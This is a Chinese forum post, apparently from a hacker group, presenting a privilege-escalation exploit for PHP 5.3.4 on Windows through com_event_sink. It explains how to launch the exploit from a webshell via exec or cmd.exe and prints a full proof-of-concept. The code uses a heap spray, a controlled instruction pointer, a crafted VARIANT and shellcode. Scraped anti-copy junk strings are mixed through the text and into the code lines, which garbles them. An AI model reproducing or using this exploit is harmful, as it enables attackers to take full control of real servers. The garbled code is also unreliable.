PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
* q/ O0 I! o2 c3 G+ `9 o( g" s
测试方法如下：cmd /c x:\php\php.exe x:\test.php

8 G& N7 M# d: W6 a8 l" r4 k下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
% ^4 P* X; E. ], D8 D7 Z这里是两个测试的截图：




# |" i& F0 O6 @6 P/ P* a
$ S. a/ Z1 f+ {4 I4 q成功利用此漏洞的攻击者将获得系统的最高权限




" `  D) T3 f  r$ D9 @) ~1 b
关于漏洞分析稍后附上。一下是PoC代码：

1 l' P, W& x. q" V: O% F9 W<?php
3 o* T  N  c6 J& }//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
. i5 o- ]3 U4 Y& V. L  V  @4 A//$eip ="\x44\x43\x42\x41";
1 n: u8 e. u" [0 F' Z% H6 c% {2 k$eip= "\x4b\xe8\x57\x78";
2 w6 k" a9 |. w4 p  Y# w$eax ="\x80\x01\x8d\x04";
3 c2 v, R3 K9 y: E" \: p( v6 @$deodrant="";
( p0 x8 p3 @  S" K. @0 @$axespray = str_repeat($eip.$eax,0x80);
% g1 @7 L, E# k: C! V//048d0190
echo strlen($axespray);
5 W$ B7 \/ A# P& oecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
7 a9 q& E6 m1 |- x, Y) F5 v- m: hecho "Silic Group Hacker Army - BlackBap.Org";
) }: b2 n7 F; d$ I" Y- S/ ]: C) r//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
9 z7 R% k8 B4 @+ x: T  `$terminate = "T";
$u[] =$deodrant;
9 r" j% j9 i8 z$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
" \8 s. F6 w# U0 R6 ~//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
$vVar = new VARIANT(0x048d0000+180);
: s$ H3 K) L. S) x* R' R//弹窗代码(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$var2 = new VARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
% N) k* ?/ `& A7 P8 Y?>
7 Q9 l- f( E) B. l2 r9 f. c! z